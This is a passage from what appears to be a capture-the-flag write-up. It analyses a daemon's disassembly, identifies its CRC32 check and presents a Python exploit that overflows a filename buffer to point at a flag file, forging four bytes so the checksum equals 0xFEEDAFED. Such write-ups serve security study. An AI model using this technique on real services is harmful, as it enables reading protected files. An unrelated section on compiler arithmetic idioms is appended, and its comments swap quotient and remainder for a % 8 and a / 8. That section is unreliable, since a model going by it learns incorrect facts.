.text:08048BB7                 call    _fopen
.text:08048BBC                 mov     [ebp+var_260], eax
.text:08048BC2                 cmp     [ebp+var_260], 0
.text:08048BC9                 jz      short loc_8048C25

Please just take it for granted that at 08048B78 is a call to process score server packets. So let's skip it over and analyze the next call.

.text:08048A4C CRC32           proc near               ; CODE XREF: main+F7↓p
.text:08048A4C
.text:08048A4C var_8           = dword ptr -8
.text:08048A4C var_4           = dword ptr -4
.text:08048A4C arg_0           = dword ptr  8
.text:08048A4C arg_4           = dword ptr  0Ch
.text:08048A4C arg_8           = dword ptr  10h
.text:08048A4C
.text:08048A4C                 push    ebp
.text:08048A4D                 mov     ebp, esp
.text:08048A4F                 sub     esp, 8
.text:08048A52                 mov     [ebp+var_8], 0FFFFFFFFh
.text:08048A59                 mov     [ebp+var_4], 0
.text:08048A60
.text:08048A60 loc_8048A60:                            ; CODE XREF: CRC32+4C↓j
.text:08048A60                 mov     eax, [ebp+var_4]
.text:08048A63                 cmp     eax, [ebp+arg_4]
.text:08048A66                 jge     short loc_8048A9A
.text:08048A68                 mov     eax, [ebp+var_8]
.text:08048A6B                 mov     ecx, eax
.text:08048A6D                 shr     ecx, 8
.text:08048A70                 mov     eax, [ebp+var_4]
.text:08048A73                 add     eax, [ebp+arg_0]
.text:08048A76                 movzx   eax, byte ptr [eax]
.text:08048A79                 xor     eax, [ebp+var_8]
.text:08048A7C                 and     eax, 0FFh
.text:08048A81                 lea     edx, ds:0[eax*4]
.text:08048A88                 mov     eax, [ebp+arg_8]
.text:08048A8B                 mov     eax, [edx+eax]
.text:08048A8E                 xor     eax, ecx
.text:08048A90                 mov     [ebp+var_8], eax
.text:08048A93                 lea     eax, [ebp+var_4]
.text:08048A96                 inc     dword ptr [eax]
.text:08048A98                 jmp     short loc_8048A60
.text:08048A9A ; ---------------------------------------------------------------------------
.text:08048A9A
.text:08048A9A loc_8048A9A:                            ; CODE XREF: CRC32+1A↑j
.text:08048A9A                 mov     eax, [ebp+var_8]
.text:08048A9D                 not     eax
.text:08048A9F                 leave
.text:08048AA0                 retn
.text:08048AA0 CRC32           endp

If you have seen CRC32 routine before, you will be able to tell this is it. A few signatures are the 0xFFFFFFFF initial value, the "take each character, xor it, and logical and it with 0xFF" (movzx, xor and and starting from 08048A76, and the negation at 08048A9D.

Now we go back to the main function. After taking CRC32 value of the whole read input_buffer, the value is compared with 0xFEEDAFED. If it is equal, then the filename is open, read and written out.

Exploit it

Let's gather what we've got. First we are able to overflow the filename buffer. Second, if the CRC value matches 0xFEEDAFED, the file identified by filename will be opened, read, and written out to stdout. And there lies our only challenge, to construct a buffer with CRC32 value matching 0xFEEDAFED.

import zlib
buffer = "a" * (0x258 - 0x48) + "/etc/flags/daemon01.txt\x00"

def fix_crc(buffer, target_crc):
  buffer_crc = zlib.crc32(buffer)
  charset = [chr(x) for x in range(256)]
  fix = ['a'] * 4
  crc = [0] * 4
  for fix[0] in charset:
    crc[0] = zlib.crc32(fix[0], buffer_crc)
    for fix[1] in charset:
      crc[1] = zlib.crc32(fix[1], crc[0])
      for fix[2] in charset:
        crc[2] = zlib.crc32(fix[2], crc[1])
        for fix[3] in charset:
          crc[3] = zlib.crc32(fix[3], crc[2])
          if (crc[3] & 0xFFFFFFFF) == target_crc:
            return ''.join(fix)

buffer = buffer + fix_crc(buffer, 0xFEEDAFED)

Behold our super-elite Python code! It will generate an exploit string ready to be sent to port 1111. Of course it runs damn slow. You are better off applying the reverse CRC32 described by anarchriz.

Observation

This daemon is similar to last year HITB 2006 KL CTF. Last year the CRC32 is a bit different, it used the same lookup table but initial value was not the standard 0xFFFFFFFF and there was no negation at the end. This year, the CRC32 is the standard CRC32 used in Zlib.

All examples below use signed integers.

mov   eax, DWORD PTR _a$[esp+52]  ; eax takes value of a
lea   ecx, DWORD PTR [eax*8]      ; ecx takes value of a * 8

a * 8;

mov   eax, DWORD PTR _a$[esp+28]  ; eax takes value of a
lea   ecx, DWORD PTR [eax+eax*2]  ; ecx = eax * 3
add   ecx, ecx                    ; ecx = ecx * 2 (or, eax * 6)

a * 6;

mov   edx, DWORD PTR _a$[esp+36]
and   edx, -2147483641                        ; 80000007H
jns   SHORT $LN3@main
dec   edx
or    edx, -8                                 ; fffffff8H
inc   edx
$LN3@main:
; here edx takes the value of the quotient

a % 8;

mov   eax, DWORD PTR _a$[esp+44]
cdq
and   edx, 7
add   eax, edx
sar   eax, 3
; here eax takes the value of the remainder

a / 8;

mov   ecx, DWORD PTR _c$[esp+20]
mov   eax, 715827883                          ; 2aaaaaabH
imul  ecx
mov   eax, edx
shr   eax, 31                                 ; 0000001fH
add   eax, edx

c / 6

mov   ecx, DWORD PTR _c$[esp+12]
mov   eax, 715827883                          ; 2aaaaaabH
imul  ecx
mov   eax, edx
shr   eax, 31                                 ; 0000001fH
add   eax, edx
lea   edx, DWORD PTR [eax+eax*2]
add   edx, edx
sub   ecx, edx

c % 6